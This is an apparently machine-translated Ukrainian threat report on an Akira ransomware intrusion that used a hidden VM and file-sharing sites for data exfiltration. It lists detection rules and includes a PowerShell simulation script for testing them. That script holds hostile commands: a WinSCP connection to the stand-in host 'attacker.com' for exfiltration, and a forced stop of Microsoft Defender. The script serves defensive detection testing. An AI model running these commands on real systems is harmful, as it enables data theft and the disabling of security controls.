Akira, LimeWire та кислий присмак ексфільтрації даних
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Одному з афілійованих суб’єктів програми-здирника Akira вдалося отримати несанкціонований доступ до гіпервізора і створити нову віртуальну машину для використання як приховане середовище. Зловмисник використовував цю ізольовану віртуальну машину, щоб уникнути моніторингу безпеки, підготувати дані за допомогою WinRAR і ексфільтрувати архіви через платформу обміну файлами Easyupload.io. Цей випадок демонструє, як загрози продовжують зловживати легітимними сервісами завантажень для крадіжки даних.
Розслідування
Розслідування поєднало телеметрію EDR, Windows Event Logs і історію браузера Microsoft Edge для реконструкції вторгнення. Аналітики також відновили VHDX-образ бірюзійної віртуальної машини, що виявило відключення зловмисником Microsoft Defender і налаштування операції програмного забезпечення Akira. Судовий аналіз віртуальної машини розкрив точні інструменти, веб-сайти та робочий потік, використані під час стадій підготовки і ексфільтрації.
Запобігання
Організації повинні контролювати появу нових або несанкціонованих кінцевих точок і віртуальних машин в їх середовищі. Сильна видимість віддаленого доступу до критичних систем, таких як гіпервізори та контролери домену, є необхідною. Також важливо обмежити або ретельно контролювати доступ до відомих сервісів обміну файлами і швидкого завантаження, які можуть використовуватися для ексфільтрації.
Відповідь
Якщо виявлено несанкціонований доступ до гіпервізора, негайно ізолюйте відповідний гіпервізор та будь-які новостворені віртуальні машини. Проведіть судовий аналіз образів дисків віртуальних машин, щоб визначити ступінь підготовки та ексфільтрації даних. Перевірте журнали доступу для простеження початкової точки входу та підтвердьте, що постійного доступу атакуючого більше немає.
Потік Атаки
Виявлення
LOLBAS Finger (через командний рядок)
Переглянути
Можливе впровадження / ексфільтрація / C2 даних через сторонні служби / інструменти (через командний рядок)
Переглянути
Можливе впровадження / ексфільтрація / C2 даних через сторонні служби / інструменти (через проксі)
Переглянути
Можливе впровадження / ексфільтрація / C2 даних через сторонні служби / інструменти (через DNS)
Переглянути
Атака програмою-здирником Akira через нову віртуальну машину та ексфільтрацію даних [створення процесів Windows]
Переглянути
Виконання симуляції
Попередня умова: перевірка телеметрії та базового рівня повинна пройти успішно.
Пояснення: цей розділ детально описує точне виконання техніки противника (TTP), призначеної для виклику правила виявлення. Команди та наратив МАЮТЬ точно відображати визначені TTP і мають виконувати саме ту телеметрію, яка очікується логікою виявлення. Абстрактні або не пов’язані приклади призведуть до помилкових діагнозів.
-
Нарратив та команди атаки: Зловмисник отримав початковий доступ і прагне збільшити вплив. Спочатку проводиться перерахування чутливих файлів шляхом перевірки відомих текстових файлів, таких як
AdUsers.txt. Щоб підготуватися до ексфільтрації, вони використовуютьWinRAR.exeдля стиснення даних. Потім готують їх інструмент для ексфільтрації,WinSCP.exe, і нарешті виконуютьakira.exeнавантку програмного забезпечення-здирника. Щоб запобігти зупиненню процесу EDR/Антивірусом, вони намагаються зупинити сервісWindefend. Ця конкретна послідовність аргументів командного рядка та змін стану служб призначена для виклику логіки виявлення специфічної для Akira. -
Скрипт для регресійного тесту:
# Скрипт симуляції для перевірки виявлення програмного забезпечення Akira # ПРИМІТКА: цей скрипт вимагає адміністративних привілеїв для зупинки сервісу Defender. Write-Host "[+] Початок симуляції Akira Ransomware..." -ForegroundColor Cyan # 1. Симуляція виявлення/перерахування (T1119) Write-Host "[+] Крок 1: імітація перерахування файлів через Notepad..." Start-Process notepad.exe -ArgumentList "AdUsers.txt" Start-Sleep -Seconds 2 # 2. Симуляція архівування даних (T1560.003) # Примітка: ми припускаємо, що WinRAR присутній, або імітуємо активність командного рядка Write-Host "[+] Крок 2: Імітація архівування даних за допомогою WinRAR..." Start-Process "WinRAR.exe" -ArgumentList "a -r sensitive_data.rar AdUsers.txt AdComp.txt" Start-Sleep -Seconds 2 # 3. Імітація підготовки інструмента для ексфільтрації (T1105) Write-Host "[+] Крок 3: Імітація виконання інструмента ексфільтрації..." Start-Process "WinSCP.exe" -ArgumentList "/command open sftp://attacker.com" Start-Sleep -Seconds 2 # 4. Симуляція виконання програмного забезпечення-здирника (T1204.002) Write-Host "[+] Крок 4: Імітація виконання навантаження Akira..." Start-Process "akira.exe" Start-Sleep -Seconds 2 # 5. Симуляція відключення Defender (T1564.006) # Це викликає EventID 7036 в системному логi Write-Host "[+] Крок 5: Спроба зупинки Microsoft Defender..." Stop-Service -Name "Windefend" -Force Write-Host "[+] Симуляція завершена. Перевірте SIEM на предмет сповіщень." -ForegroundColor Green -
Команди очищення:
# Скрипт очищення Write-Host "[+] Очищення артефактів симуляції..." -ForegroundColor Cyan # Перезапуск сервісу Defender Start-Service -Name "Windefend" # Видалення симульованих файлів Remove-Item -Path "AdUsers.txt", "AdComp.txt", "sensitive_data.rar" -ErrorAction SilentlyContinue Write-Host "[+] Очищення завершено." -ForegroundColor Green